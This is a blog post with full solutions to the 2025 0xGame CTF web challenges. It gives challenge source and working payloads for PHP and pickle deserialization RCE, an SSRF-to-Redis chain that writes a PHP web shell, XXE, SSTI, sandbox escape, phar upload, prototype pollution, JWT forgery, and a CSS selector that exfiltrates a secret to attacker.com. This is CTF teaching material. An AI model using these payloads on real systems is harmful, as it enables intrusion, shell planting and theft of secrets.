2025 0xGame Web 方向题目全解 | 极客日志

编程语言Node.jsAIjava算法

2025 0xGame Web 方向题目全解

2025 年 0xGame 网络安全竞赛 Web 方向的解题思路。涵盖 RCE、反序列化、SSRF、XSS、沙箱逃逸、文件上传及模型污染等多种漏洞类型。涉及 PHP、Python、Node.js、Java 等语言的技术实现与 Payload 构造，提供了具体的代码示例和绕过技巧。

奇形怪状发布于 2026/4/5更新于 2026/4/132 浏览

第一周

RCE1

考点：或运算构造 system

<?php error_reporting(0); highlight_file();  = [];  = [];  = [];  = ; {  ;  () (, ); }  (() && ()){ (() === () &&  !== ){ (!()){ (); }  {  ; } }  {  ; } } {  ; }

print_r(scandir('/')); // 查根目录文件

(systee|systel)('tac /f???'); // 直接一或运算将 system 构造出来，或者这里没过滤反引号，直接 print(`tac /f???`);也行，或者 readfile('/'.'fl'.'ag');

<?php error_reporting(0); highlight_file(__FILE__); class ZZZ { public $yuzuha; function __construct($yuzuha) { $this -> yuzuha = $yuzuha; } function __destruct() { echo "破绽，在这里！" . $this -> yuzuha; } } class HSR { public $robin; function __get($robin) { $castorice = $this -> robin; eval($castorice); } } class HI3rd { public $RaidenMei; public $kiana; public $guanxing; function __invoke() { if($this -> kiana !== $this -> RaidenMei && md5($this -> kiana) === md5($this -> RaidenMei) && sha1($this -> kiana) === sha1($this -> RaidenMei)) return $this -> guanxing -> Elysia; } } class GI { public $furina; function __call($arg1, $arg2) { $Charlotte = $this -> furina; return $Charlotte(); } } class Mi { public $game; function __toString() { $game1 = @$this -> game -> tks(); return $game1; } } if (isset($_GET['0xGame'])) { $web = unserialize($_GET['0xGame']); throw new Exception("Rubbish_Unser"); } ?>

<?php error_reporting(0); class ZZZ { public $yuzuha; function __construct($yuzuha) { $this -> yuzuha = $yuzuha; } function __destruct() { echo "破绽，在这里！" . $this -> yuzuha; } } class HSR { public $robin="system('env');"; function __get($robin) { echo "4"; $castorice = $this -> robin; eval($castorice); } } class HI3rd { public $RaidenMei; public $kiana; public $guanxing; function __invoke() { echo "3"; if($this -> kiana !== $this -> RaidenMei && md5($this -> kiana) === md5($this -> RaidenMei) && sha1($this -> kiana) === sha1($this -> RaidenMei)) return $this -> guanxing -> Elysia; } } class GI { public $furina; function __call($arg1, $arg2) { echo "2"; $Charlotte = $this -> furina; return $Charlotte(); } } class Mi { public $game; function __toString() { echo "1"; $game1 = @$this -> game -> tks(); return $game1; } } $a=new ZZZ(1); $a-> yuzuha=new Mi(); $a-> yuzuha->game=new GI(); $a-> yuzuha->game->furina=new HI3rd(); $a-> yuzuha->game->furina->kiana=new Exception("",1);$a-> yuzuha->game->furina->RaidenMei=new Exception("",2); $a-> yuzuha->game->furina->guanxing=new HSR(); echo urlencode(serialize($a)); ?>

from flask import Flask,request,render_template import json import os app = Flask(__name__) def merge(src, dst): for k, v in src.items(): if hasattr(dst, '__getitem__'): if dst.get(k) and type(v) == dict: merge(v, dst.get(k)) else: dst[k] = v elif hasattr(dst, k) and type(v) == dict: merge(v, getattr(dst, k)) else: setattr(dst, k, v) class Dst(): def __init__(self): pass Game0x = Dst() @app.route('/',methods=['POST', 'GET']) def index(): if request.data: merge(json.loads(request.data), Game0x) return render_template("index.html", Game0x=Game0x) @app.route("/<path:path>") def render_page(path): if not os.path.exists("templates/" + path): return "Not Found", 404 return render_template(path) if __name__ == '__main__': app.run(host='0.0.0.0', port=9000)

{ "__init__":{ "__globals__":{ "os":{ "path":{ "pardir":"!" } } } } }

<!DOCTYPE evil [ <!ENTITY xxe SYSTEM "file:///flag"> ]> <user><username>&xxe;</username><password>&xxe;</password></user>

0xGame{Hello，JavaScript}

Use GET To Send Your Loved Data!!! BlackList = [b'', b''] @app.route('/pickle_dsa') def pic(): data = request.args.get('data') if not data: return "Use GET To Send Your Loved Data" try: data = base64.b64decode(data) except Exception: return "Cao!!!" for b in BlackList: if b in data: return "卡了" p = pickle.loads(data) print(p) return f" Vamos! {p}

import pickle import base64 import os class P(object): def __reduce__(self): return (eval, ("__import__('os').popen('env').read()",)) payload = pickle.dumps(P(), protocol=0) b64_payload = base64.b64encode(payload) print(payload) print(b64_payload.decode())

import base64'csubprocess check_output (S'env' tR.'''.encode() print(base64.b64encode(opcode).decode())

from flask import Flask, request from urllib.parse import urlparse import socket import os app = Flask(__name__) BlackList = [ 'localhost', '@', '172', 'gopher', 'file', 'dict', 'tcp', '0.0.0.0', '114.5.1.4' ] def check(url: str) -> bool: parsed = urlparse(url) host = parsed.hostname if not host: return False host_ascii = host.encode('idna').decode('utf-8') try: ip = socket.gethostbyname(host_ascii) except Exception: return False return ip == '114.5.1.4' @app.route('/') def index(): return open(__file__, 'r', encoding='utf-8').read() @app.route('/ssrf') def ssrf(): raw_url = request.args.get('url') if not raw_url: return 'URL Needed' for u in BlackList: if u in raw_url: return 'Invaild URL' if check(raw_url): cmd = request.args.get('cmd', '') return os.popen(cmd).read() else: return 'NONONO' if __name__ == '__main__': app.run(host='0.0.0.0', port=8000)

ssrf?url=http://1912930564/&cmd=cat%20/f*

<?php highlight_file(__FILE__); error_reporting(0); //hint: Redis20251206 class pure{ public $web; public $misc; public $crypto; public $pwn; public function __construct($web, $misc, $crypto, $pwn){ $this->web = $web; $this->misc = $misc; $this->crypto = $crypto; $this->pwn = $pwn; } public function reverse(){ $this->pwn = new $this->web($this->misc, $this->crypto); } public function osint(){ $this->pwn->play_0xGame(); } public function __destruct(){ $this->reverse(); $this->osint(); } } $AI = $_GET['ai']; $ctf = unserialize($AI); ?>

<?php class pure { public $web; public $misc; public $crypto; public $pwn; } // 创建对象实例 $a = new pure(); $a->web = 'SoapClient'; $a->misc = null; $a->pwn = null; // 配置目标地址和 Redis 命令 $target = 'http://127.0.0.1:6379/'; $poc = "AUTH 20251206\r\n" . "CONFIG SET dir /var/www/html/\r\n" . "CONFIG SET dbfilename shell.php\r\n" . "SET x '<?= @eval(\$_POST[1]) ?>'\r\n" . "SAVE"; // 构造 crypto 数组（攻击载荷的核心） $a->crypto = array( 'location' => $target, 'uri' => "hello\"\r\n" . $poc . "\r\nhello" ); // 输出 URL 编码后的序列化字符串 echo serialize($a);

<?php $target = 'http://127.0.0.1:6379/'; $poc1 = "AUTH 20251206"; $poc2 = "CONFIG SET dir /var/www/html/"; $poc3 = "CONFIG SET dbfilename shel.php"; $poc4 = "SET x '<?= @eval(\$_POST[1]) ?>'"; $poc5 = "SAVE"; $a = array('location' => $target, 'uri' => 'hello"^^' . $poc1 . '^^' . $poc2 . '^^' . $poc3 . '^^' . $poc4 . '^^' . $poc5 . '^^hello'); $b = serialize($a); $b = str_replace('^^', "\r\n", $b); $c = unserialize($b); class pure { public $web = 'SoapClient'; public $misc = null; public $crypto; public $pwn; } $a=new pure(); $a->crypto=$c; echo urlencode(serialize($a));

{{lipsum['__glo''bals__']['o''s']['po''pen']('cat /f*')['re''ad']()}}

<?php error_reporting(0); if (isset($_GET['0xGame'])) { highlight_file(__FILE__); } if (isset($_POST['web'])) { $web = $_POST['web']; if (strlen($web) <= 120) { if (is_string($web)) { if (!preg_match("/[!@#%^&*:'\-<?>"\/|`a-zA-BD-GI-Z~\\]/", $web)) { eval($web); } else { echo("NONONO!"); } } else { echo "No String!"; } } else { echo "too long!"; } } ?>

$_=[]._;//Array $__=$_[1];//r $_=$_[0];//A $_++;//B $_1=++$_;//$_1=C,$_=D(这里是前缀++,即先自增一再赋值) $_++;$_++;$_++;$_++;//$_=H $_=$_1.++$_.$__;//CHr $_=_.$_(71).$_(69).$_(84);//_GET $$_[1]($$_[2]); //$_GET[1]$_GET[2]

get 0xGame=1&1=system&2=cat /f* post web=%24_%3D%5B%5D._%3B%24__%3D%24_%5B1%5D%3B%24_%3D%24_%5B0%5D%3B%24_%2B%2B%3B%24_1%3D%2B%2B%24_%3B%24_%2B%2B%3B%24_%2B%2B%3B%24_%2B%2B%3B%24_%2B%2B%3B%24_%3D%24_1.%2B%2B%24_.%24__%3B%24_%3D_.%24_(71).%24_(69).%24_(84)%3B%24%24_%5B1%5D(%24%24_%5B2%5D)%3B%20

from flask import Flask, request, Response import sys import io app = Flask(__name__) blackchar = "&*^%#${}@!~`·/<>" def safe_sandbox_Exec(code): whitelist = { "print": print, "list": list, "len": len, "Exception": Exception, } safe_globals = {"__builtins__": whitelist} original_stdout = sys.stdout original_stderr = sys.stderr sys.stdout = io.StringIO() sys.stderr = io.StringIO() try: exec(code, safe_globals) output = sys.stdout.getvalue() error = sys.stderr.getvalue() return output or error or "No output" except Exception as e: return f"Error: {e}" finally: sys.stdout = original_stdout sys.stderr = original_stderr @app.route("/") def index(): return open(__file__).read() @app.route("/check", methods=["POST"]) def check(): data = request.form.get("data", "") if not data: return Response("NO data", status=400) for d in blackchar: if d in data: return Response("NONONO", status=400) secret = safe_sandbox_Exec(data) return Response(secret, status=200) if __name__ == "__main__": app.run(host="0.0.0.0", port=9000)

import Typhon cmd = "ls /" # Typhon 会把它转为可执行的 Python payload Typhon.bypassRCE( cmd, local_scope={'__builtins__': {'print':print,'list':list,'len':len,'Exception':Exception}}, banned_chr=list("&*^%#${}@!~`·/<>", max_length=160, interactive=False, print_all_payload=True, # 想看所有候选就开 log_level='INFO' )

print(list.__class__.__subclasses__(list.__class__)[0].register.__globals__['__builtins__']['__import__']('os').popen('env').read())

import requests
try:
    raise Exception()
except Exception as e:
    frame = e.__traceback__.tb_frame.f_back.f_back
    builtins = frame.f_globals['__builtins__']
    output = builtins.__import__('os').popen('env').read()
    print(output)
'''
url = "http://9000-e2e3ae94-819b-4f4f-b420-e85c8d221c24.challenge.ctfplus.cn/check"
res = requests.post(url, data={"data": payload})
print(res.text)

<?php error_reporting(0); class MaHaYu{ public $HG2; public $ToT; public $FM2tM; public function __construct() { $this -> ZombiegalKawaii(); } public function ZombiegalKawaii() { $HG2 = $this -> HG2; if(preg_match("/system|print|readfile|get|assert|passthru|nl|flag|ls|scandir|check|cat|tac|echo|eval|rev|report|dir/i",$HG2)) { die("这这这你也该绕过去了吧"); } else{ $this -> ToT = "这其实是来自各位的"; } } public function __destruct() { $HG2 = $this -> HG2; $FM2tM = $this -> FM2tM; echo "Wow"; var_dump($HG2($FM2tM)); } } z $file=$_POST['file']; if(isset($_POST['file'])) { if (preg_match("/'[\$%&#@*]|flag|file|base64|go|git|login|dict|base|echo|content|read|convert|filter|date|plain|text|;|<|>/i", $file)) { die("对方撤回了一个请求，并企图蒙混过关"); } echo base64_encode(file_get_contents($file)); }

<?php error_reporting(0); class MaHaYu{ public $HG2; public $ToT; public $FM2tM; public function __construct() { $this -> ZombiegalKawaii(); } public function ZombiegalKawaii() { $HG2 = $this -> HG2; if(preg_match("/system|print|readfile|get|assert|passthru|nl|flag|ls|scandir|check|cat|tac|echo|eval|rev|report|dir/i",$HG2)) { die("这这这你也该绕过去了吧"); } else{ $this -> ToT = "这其实是来自各位的"; } } public function __destruct() { $HG2 = $this -> HG2; $FM2tM = $this -> FM2tM; echo "Wow"; var_dump($HG2($FM2tM)); } } $a = new MaHaYu(); $a -> HG2 = "getenv"; $a->FM2tM="FLAG"; //本来用 glob 发现根目录无 flag，直接看环境就好了 $phar = new Phar("2.phar"); //.phar 文件 $phar->startBuffering(); $phar->setStub('<?php __HALT_COMPILER(); ?>'); //固定的 $phar->setMetadata($a); $phar->addFromString("exp.txt", "test"); //随便写点什么生成个签名，添加要压缩的文件 $phar->stopBuffering(); $fp = gzopen("2.phar.gz", 'w9'); gzwrite($fp, file_get_contents("2.phar")); gzclose($fp); // 将 2.phar.gz 重命名为 2.phar.png @rename("2.phar.gz", "1.phar.png"); ?>

phar://upload/1.phar.png

const fs = require('fs'); const express = require('express'); //const session = require('express-session'); const bodyParser = require('body-parser'); const jwt = require('jsonwebtoken'); const crypto = require("crypto"); const cookieParser = require('cookie-parser'); const DEFAULT_CONFIG = { name: "EverNight", default_path: "The Remembrance", place: "Amphoreus", min_public_time: "2025-08-03" }; const CONFIG = { name: "EverNight", default_path: "The Remembrance", place: "Amphoreus" } const users = new Map(); const FLAG = process.env.FLAG || 'oXgAmE{Just_A_Flag}' const JWT_SECRET = crypto.randomBytes(32).toString('hex'); const app = express(); app.set('view engine', 'ejs'); app.use(express.static('public')); app.use(bodyParser.json()); app.use(bodyParser.urlencoded({ extended: false })); app.use(cookieParser()); if (!fs.existsSync('[email protected]')) { fs.writeFileSync('[email protected]', crypto.randomBytes(16).toString('hex').trim()); } users.set('admin', fs.readFileSync('[email protected]').toString()) // function requireLogin(req, res, next) { // const token = req.cookies.token || req.headers.authorization?.split(' ')[1]; // if (!token) { // return res.redirect('/login', ); // } // } function merge(dst, src) { if (typeof dst !== "object" || typeof src !== "object") return dst; for (let key in src) { if (key in src && key in dst) { merge(dst[key], src[key]); } else { dst[key] = src[key]; } } } function generateJWT(username, password) { return jwt.sign({ username, password }, JWT_SECRET, { expiresIn: '10h' }); } function Check(token){ if(!token){ res.redirect('/login'); } const data = jwt.decode(token); //没鉴权 if(data.username === "admin"){ return true; } else{ return false; } } function Admin_Check(req, res, next){ const token = req.cookies.token || req.headers.authorization?.split(' ')[1]; if(!token){ return res.redirect('/login', {message: "Need Login!"}); } try{ const data = jwt.decode(token); //没鉴权 if(data.username === 'admin'){ return next(); } else{ return res.redirect('/trailblazer'); } } catch (err){ return res.redirect('/login'); } } app.get('/', (req, res) => { res.render('index'); }) app.get('/login', (req, res) => { res.render('login'); }) app.get('/register', (req, res) => { res.render('register', { message: '' }); }); app.get('/logout', (req, res) => { res.clearCookie('token'); res.redirect('/login'); }); app.post('/login', (req, res) => { let username = req.body.username; let password = req.body.password; let token = req.cookies.token || req.headers.authorization?.split(' ')[1]; if (!users.has(username)) { return res.render('login', { message: 'Invalid username or password.' }); } if (users.get(username) !== password) { return res.render('login', { message: 'Invalid username or password.' }); } if(Check(token)){ res.redirect('/admin_club1st'); } else{ res.redirect('/trailblazer'); } }); app.post('/register', (req, res) => { let username = req.body.username; let password = req.body.password; if (users.has(username)) { return res.render('register', { message: 'Username already exists.' }); } users.set(username, password); const data = generateJWT(username, password); res.cookie('token', data, {httpOnly: false}); res.redirect('/login'); }); app.get('/admin_club1st', Admin_Check, (req, res) => { return res.render('admin'); }) app.post('/admin_club1st', Admin_Check, (req, res) => { let body = req.body; let evernight = Object.create(CONFIG); let min_public_time = CONFIG.min_public_time || DEFAULT_CONFIG.min_public_time; merge(evernight, body); let en = Object.create(CONFIG); if (en.min_public_time < "2025-08-03") { return res.render('march7th', {message: FLAG}); } return res.render('evernight'); }); app.get('/trailblazer', (req, res) => { return res.render('trailblazer', {message: "Failed Amphoreus"}) }) app.listen(80, () => { console.log('Server is running on port 80'); })

import jwt import datetime import time # 定义标头（Headers） headers = {"alg":"HS256","typ":"JWT"} # 定义有效载体（Payload） token_dict = { "username":"admin", "password":"user", "iat":time.time(), "exp":time.time() + 36000} # 密钥 jwt_token = jwt.encode(token_dict, secret, algorithm='HS256', headers=headers) print("JWT Token:", jwt_token)

{"__proto__": { "min_public_time": "2025-08-01" }}

<?php highlight_file(__FILE__); echo("Please Input Your CMD"); $cmd = $_POST['__0xGame2025phpPsAux']; eval($cmd); ?>

cd /var/www/html/primary/ echo "">"-H" ln -s /flag ff cd ../marstream cat f

//original-author: gtg2619 //adapt: P const express = require('express'); const ejs = require('ejs'); const fs = require('fs'); const path = require('path'); const app = express(); app.set('view engine', 'ejs'); app.use(express.json({ limit: '114514mb' })); const STATIC_DIR = __dirname; function serveIndex(req, res) { // Useless Check , So It's Easier var whilePath = ['index']; var templ = req.query.templ || 'index'; if (!whilePath.includes(templ)){ return res.status(403).send('Denied Templ'); } var lsPath = path.join(__dirname, req.path); try { res.render(templ, { filenames: fs.readdirSync(lsPath), path: req.path }); } catch (e) { res.status(500).send('Error'); } } app.use((req, res, next) => { if (typeof req.path !== 'string' || (typeof req.query.templ !== 'string' && typeof req.query.templ !== 'undefined' && typeof req.query.templ !== null) ) res.status(500).send('Error'); else if (/js$|\.\./i.test(req.path)) res.status(403).send('Denied filename'); else next(); }) app.use((req, res, next) => { if (req.path.endsWith('/')) serveIndex(req, res); else next(); }) app.put('/*', (req, res) => { // Why Filepath Not Check ? const filePath = path.join(STATIC_DIR, req.path); fs.writeFile(filePath, Buffer.from(req.body.content, 'base64'), (err) => { if (err) { return res.status(500).send('Error'); } res.status(201).send('Success'); }); }); app.listen(80, () => { console.log(`running on port 80`); });

<%- global.process.mainModule.require('child_process').execSync('env') %>

{"content":"PCUtIGdsb2JhbC5wcm9jZXNzLm1haW5Nb2R1bGUucmVxdWlyZSgnY2hpbGRfcHJvY2VzcycpLmV4ZWNTeW5jKCdlbnYnKQ0KJT4="}

from Crypto.Util.number import getPrime, bytes_to_long from gmpy2 import invert import random import uuid # 通过 RSA 得到 UUID8 的 a # 再通过其他方式获取到 b 和 c # 利用 UUID8 生成 Admin 密码 msg= b'' BITS = 1024 e = 65537 p = getPrime(BITS//2) q = getPrime(BITS//2) n = p * q phi = (p - 1) * (q - 1) d = int(invert(e, phi)) key = bytes_to_long(msg) c = pow(key, e, n) dp = d % (p - 1) #print("n = ", n) #print("e = ", e) #print("c = ", c) #print("dp = ", dp) #{}内的 key = key.encode() key = int.from_bytes(key, 'big') pa = uuid.uuid8(a=key) #n = 70344167219256641077015681726175134324347409741986009928113598100362695146547483021742911911881332309275659863078832761045042823636229782816039860868563175749260312507232007275946916555010462274785038287453018987580884428552114829140882189696169602312709864197412361513311118276271612877327121417747032321669 #e = 65537 #c = 46438476995877817061860549084792516229286132953841383864271033400374396017718505278667756258503428019889368513314109836605031422649754190773470318412332047150470875693763518916764328434140082530139401124926799409477932108170076168944637643580876877676651255205279556301210161528733538087258784874540235939719 #dp = 7212869844215564350030576693954276239751974697740662343345514791420899401108360910803206021737482916742149428589628162245619106768944096550185450070752523

import math import random import re # Given RSA parameters and leak n = 70344167219256641077015681726175134324347409741986009928113598100362695146547483021742911911881332309275659863078832761045042823636229782816039860868563175749260312507232007275946916555010462274785038287453018987580884428552114829140882189696169602312709864197412361513311118276271612877327121417747032321669 e = 65537 c = 46438476995877817061860549084792516229286132953841383864271033400374396017718505278667756258503428019889368513314109836605031422649754190773470318412332047150470875693763518916764328434140082530139401124926799409477932108170076168944637643580876877676651255205279556301210161528733538087258784874540235939719 dp = 7212869844215564350030576693954276239751974697740662343345514791420899401108360910803206021737482916742149428589628162245619106768944096550185450070752523 def recover_p_from_dp(n: int, e: int, dp: int, max_trials: int = 256) -> int: """Recover a prime factor p of n from e and dp (where dp = d mod (p-1)). Strategy: Let k = e*dp - 1, which is a multiple of (p-1). Use a Miller-style splitting approach: factor out powers of two and try gcd(pow(g, k', n) - 1, n) during repeated squaring. """ k = e * dp - 1 # Remove factors of 2 from k r = 0 t = k while t % 2 == 0: t //= 2 r += 1 for _ in range(max_trials): g = random.randrange(2, n - 2) x = pow(g, t, n) if x == 1 or x == n - 1: continue for _ in range(r + 1): p = math.gcd(x - 1, n) if 1 < p < n: return p x = pow(x, 2, n) if x == 1: break # Fallback: direct attempt with k for _ in range(max_trials): g = random.randrange(2, n - 2) x = pow(g, k, n) p = math.gcd(x - 1, n) if 1 < p < n: return p raise ValueError("Failed to recover prime factor with dp leak") def modinv(a: int, m: int) -> int: return pow(a, -1, m) def int_to_bytes(i: int) -> bytes: if i == 0: return b"\x00" length = (i.bit_length() + 7) // 8 return i.to_bytes(length, 'big') def padding(input_string: str) -> int: byte_string = input_string.encode('utf-8') if len(byte_string) > 6: byte_string = byte_string[:6] padded_byte_string = byte_string.ljust(6, b'\x00') padded_int = int.from_bytes(padded_byte_string, byteorder='big') return padded_int def extract_braced_value(text: str) -> str | None: match = re.search(r"\{([^}]*)\}", text) return match.group(1) if match else None def main(): # Recover p from dp p = recover_p_from_dp(n, e, dp) q = n // p assert p * q == n phi = (p - 1) * (q - 1) d = modinv(e, phi) m = pow(c, d, n) m_bytes = int_to_bytes(m) decoded = m_bytes.decode('utf-8', errors='ignore') inner = extract_braced_value(decoded) if inner is None: # Fallback: treat entire m as integer 'a' a_full = m else: a_full = int.from_bytes(inner.encode('utf-8'), 'big') a_48 = a_full & ((1 << 48) - 1) print("p=", p) print("q=", q) print("m_bytes=", decoded) print("a_full=", a_full) print("a_48=", a_48) if __name__ == "__main__": main()

a=109343314834543

import uuid def uuid8_from_chunks(a: int, b: int, c: int) -> uuid.UUID: a48 = a & ((1 << 48) - 1) b12 = b & ((1 << 12) - 1) c62 = c & ((1 << 62) - 1) int_uuid = (a48 << 80) | (b12 << 64) | c62 int_uuid |= (0x8 << 76) # version 8 int_uuid |= (0x2 << 62) # RFC 4122 variant return uuid.UUID(int=int_uuid) def main() -> None: a = 109343314834543 b = 120604030108 c = 7430469441 u = uuid8_from_chunks(a, b, c) print(u) if __name__ == "__main__": main()

java -jar JDumpSpider-1.1-SNAPSHOT-full.jar heapdump

java -jar shiro_attack-4.7.0-SNAPSHOT-all.jar

''' % from bottle import abort % a=__import__('os').popen("ls /").read() % abort(404,a) % end '''

<div> % if __import__('bottle').abort(404,__import__('os').popen("cat /flag").read()): <span>content</span> % end </div>

from bottle import Bottle, request, template, run, static_file from datetime import datetime app = Bottle() messages = [] def Comment(message):
.join([f""" <div> <img src="/static/avatar2.jpg" alt="Avatar"> <div> <p>{item['text']}</p> <small>#{idx + 1} · {item['time']}</small> </div> </div> """ for idx, item in enumerate(message)]) board = f"""//前端代码 """ return board def check(message): filtered = message.replace("{", " ").replace("}", " ").replace("eval", "?").replace("system", "~").replace("exec","?").replace("7*7","我猜你想输入 7*7").replace("<","尖括号").replace(">","尖括号") return filtered @app.route('/') def index(): return template(Comment(messages)) @app.route('/comment', method='POST') def submit(): text = check(request.forms.get('message')) now = datetime.now().strftime("%Y-%m-%d %H:%M") messages.append({"text": text, "time": now}) return template(Comment(messages)) @app.route('/static/<filename:path>') def send_static(filename): return static_file(filename, root='./static') if __name__ == '__main__': run(app, host='0.0.0.0', port=9000)

// 导入 Node.js 内置模块 const fs = require('fs'); // 文件系统模块，用于读写文件 const crypto = require('crypto'); // 加密模块，用于生成随机数和加密操作 // 导入第三方模块 const express = require('express'); // Express Web 框架 const session = require('express-session') // Express 会话管理中间件 const bodyParser = require('body-parser'); // 请求体解析中间件 const createDOMPurify = require('dompurify'); // DOMPurify 库，用于清理 HTML 内容防止 XSS 攻击 const { JSDOM } = require('jsdom'); // jsdom 库，用于在 Node.js 中模拟 DOM 环境 // 创建 JSDOM 窗口对象，用于 DOMPurify 在 Node.js 环境中运行 const window = new JSDOM('').window; // 创建 DOMPurify 实例，用于清理用户输入的 HTML 内容 const DOMPurify = createDOMPurify(window); // 创建 Express 应用实例 const app = express(); // 设置视图引擎为 EJS 模板引擎 app.set('view engine', 'ejs'); // 使用 body-parser 中间件解析 URL 编码的表单数据 app.use(bodyParser.urlencoded({ extended: false })); // 配置会话管理中间件 app.use(session({ secret: crypto.randomBytes(64).toString('hex'), // 会话密钥，每次重启都会变化（随机生成 64 字节的十六进制字符串） resave: false, // 不强制保存会话，即使未被修改 saveUninitialized: true // 保存未初始化的会话（新会话） })) // 使用 Map 数据结构存储用户信息（用户名 -> 密码） const users = new Map(); // 使用 Map 数据结构存储笔记内容（笔记 ID -> 笔记内容） const notes = new Map(); // 从环境变量读取 FLAG，如果不存在则使用默认测试值 const FLAG = process.env.FLAG || '0xGame{Test_For_Fun}'; // 如果 passwd.txt 文件不存在，则创建一个新文件并写入随机密码 if (!fs.existsSync('passwd.txt')) { // 生成 16 字节的随机数据并转换为十六进制字符串作为 admin 密码 fs.writeFileSync('passwd.txt', crypto.randomBytes(16).toString('hex')); } // 从 passwd.txt 文件读取 admin 账户的密码并存储到 users Map 中 users.set('admin', fs.readFileSync('passwd.txt').toString()); // 从 bot.js 模块导入 visit 函数，用于自动化访问 URL（用于 XSS 挑战） const { visit } = require('./bot'); // 中间件函数：检查用户是否已登录 // 如果未登录则重定向到登录页面，否则继续执行下一个中间件 function requireLogin(req, res, next) { if (!req.session.user) { // 检查会话中是否存在用户信息 res.redirect('/login'); // 未登录，重定向到登录页面 } else { next(); // 已登录，继续执行下一个中间件或路由处理函数 } } // GET 路由：显示登录页面 app.get('/login', (req, res) => { res.render('login'); // 渲染 login.ejs 模板 }) // GET 路由：显示注册页面 app.get('/register', (req, res) => { res.render('register'); // 渲染 register.ejs 模板 }) // POST 路由：处理用户登录请求 app.post('/login', (req, res) => { let username = req.body.username; // 从请求体中获取用户名 let password = req.body.password; // 从请求体中获取密码 // 验证用户名是否存在且密码是否正确 if (users.has(username) && users.get(username) === password) { req.session.user = username; // 登录成功，将用户名存储到会话中 res.redirect('/'); // 重定向到首页 } else { // 登录失败，重新渲染登录页面并显示错误消息 res.render('login', { message: 'Invalid username or password.' }); } }) // POST 路由：处理用户注册请求 app.post('/register', (req, res) => { let username = req.body.username; // 从请求体中获取用户名 let password = req.body.password; // 从请求体中获取密码 // 检查用户名是否已存在 if (users.has(username)) { // 用户名已存在，重新渲染注册页面并显示错误消息 res.render('register', { message: 'Username already exists.' }); } else { // 用户名不存在，将新用户添加到 users Map 中（注意：密码以明文存储，存在安全风险） users.set(username, password); res.redirect('/login'); // 注册成功，重定向到登录页面 } }) // GET 路由：显示首页（需要登录） app.get('/', requireLogin, (req, res) => { res.render('index'); // 渲染 index.ejs 模板 }) // GET 路由：处理用户登出请求（需要登录） app.get('/logout', requireLogin, (req, res) => { req.session.destroy(); // 销毁当前会话 res.redirect('/login'); // 重定向到登录页面 }) // POST 路由：创建新笔记（需要登录） app.post('/paste', requireLogin, (req, res) => { let id = crypto.randomUUID(); // 生成一个随机的 UUID 作为笔记 ID let content = req.body.content; // 从请求体中获取笔记内容 let clean_content = DOMPurify.sanitize(content); // 使用 DOMPurify 清理 HTML 内容，防止 XSS 攻击 notes.set(id, clean_content); // 将清理后的内容存储到 notes Map 中 // 渲染首页并显示成功消息，包含笔记的访问链接 res.render('index', { message: 'Paste note successfully! <br /> ID: <a href="/view/' + id + '">' + id + '</a>' }); }) // GET 路由：查看指定 ID 的笔记（需要登录） app.get('/view/:id', requireLogin, (req, res) => { let id = req.params.id; // 从 URL 参数中获取笔记 ID // 渲染 view.ejs 模板，传入笔记信息 res.render('view', { id: id, // 笔记 ID content: notes.get(id) || 'Note not found', // 笔记内容，如果不存在则显示"Note not found" // 如果是 admin 用户，显示 FLAG；否则显示"Admin Channel" secret: (req.session.user === 'admin') ? FLAG : 'Admin Channel', // 如果是 admin 用户，显示欢迎消息；否则显示无权限提示 note: (req.session.user === 'admin')? 'Welcome Admin' : 'You Are Not Admin So No Secrets Here' }); }) // GET 路由：显示举报页面（需要登录） app.get('/report', requireLogin, (req, res) => { res.render('report'); // 渲染 report.ejs 模板 }) // POST 路由：处理 URL 举报请求（需要登录） app.post('/report', requireLogin, (req, res) => { let url = req.body.url; // 从请求体中获取要举报的 URL visit(url); // 调用 bot.js 中的 visit 函数，使用 Puppeteer 自动化访问该 URL（以 admin 身份） // 返回 JSON 响应，表示已访问 res.send({ message: 'visited' }); }) // 启动服务器，监听 3000 端口 app.listen(3000, () => { console.log('Server is running on port 3000'); // 服务器启动后输出提示信息 })

// 导入 Node.js 内置模块 const fs = require('fs'); // 文件系统模块，用于读取文件 // 导入第三方模块 const puppeteer = require('puppeteer-core'); // Puppeteer 核心库，用于控制无头浏览器（需要手动指定 Chrome 路径） // 从 passwd.txt 文件读取 admin 账户的密码（与 app.js 中使用相同的密码文件） const PASSWD = fs.readFileSync('passwd.txt').toString(); // 定义异步延迟函数，返回一个 Promise，在指定毫秒数后 resolve const sleep = (ms) => new Promise(resolve => setTimeout(resolve, ms)); // 异步函数：自动化访问指定的 URL（用于 CTF XSS 挑战） // 该函数会以 admin 身份登录，然后访问用户提供的 URL async function visit(url) { console.log('start visiting ' + url); // 输出开始访问的日志信息 try { // 启动 Puppeteer 浏览器实例 const browser = await puppeteer.launch({ // 指定 Chrome/Chromium 浏览器的可执行文件路径 // 优先使用环境变量 CHROME_PATH，如果不存在则使用默认路径 executablePath: process.env.CHROME_PATH || "/usr/bin/chromium-browser", // 浏览器启动参数 args: [ '--no-sandbox', // 禁用沙盒模式（通常在容器环境中需要） '--disable-setuid-sandbox' // 禁用 setuid 沙盒（提升兼容性） ] }); // 创建新的浏览器标签页 const page = await browser.newPage(); // 开始自动登录流程 console.log('logging in') // 输出登录日志 // 访问登录页面，等待页面完全加载（网络空闲状态） await page.goto("http://localhost:3000/login", { waitUntil: "networkidle0" }); // 在用户名输入框（#username）中输入'admin'，每次按键延迟 10 毫秒（模拟真实用户输入） await page.type('#username', 'admin', { delay: 10 }); // 在密码输入框（#password）中输入 admin 密码，每次按键延迟 10 毫秒 await page.type('#password', PASSWD, { delay: 10 }); // 点击提交按钮（#submit）提交登录表单 await page.click('#submit'); // 等待 5 秒，确保登录操作完成并跳转到首页 await sleep(5 * 1000); // 访问用户提供的目标 URL console.log('visiting ' + url) // 输出访问目标 URL 的日志 // 导航到目标 URL，等待页面完全加载（网络空闲状态） await page.goto(url, { waitUntil: "networkidle0" }); // 等待 120 秒（2 分钟），给 XSS payload 充分的执行时间 // 这允许攻击者执行复杂的 JavaScript 代码，例如发送数据到外部服务器 await sleep(120 * 1000); // 关闭浏览器实例，释放资源 await browser.close(); } catch (e) { // 捕获并输出任何错误（例如浏览器启动失败、页面加载失败等） console.log(e); } console.log('finished') // 输出完成访问的日志信息 } // 导出 visit 函数，供 app.js 中的/report 路由调用 module.exports = { visit }

/* 匹配 content 属性以"a"开头的 meta 标签 */ meta[name="secret"][content^="a"] { background: url("http://attacker.com?q=a"); }

<meta readonly name="secret" content="<%- locals.secret %>">

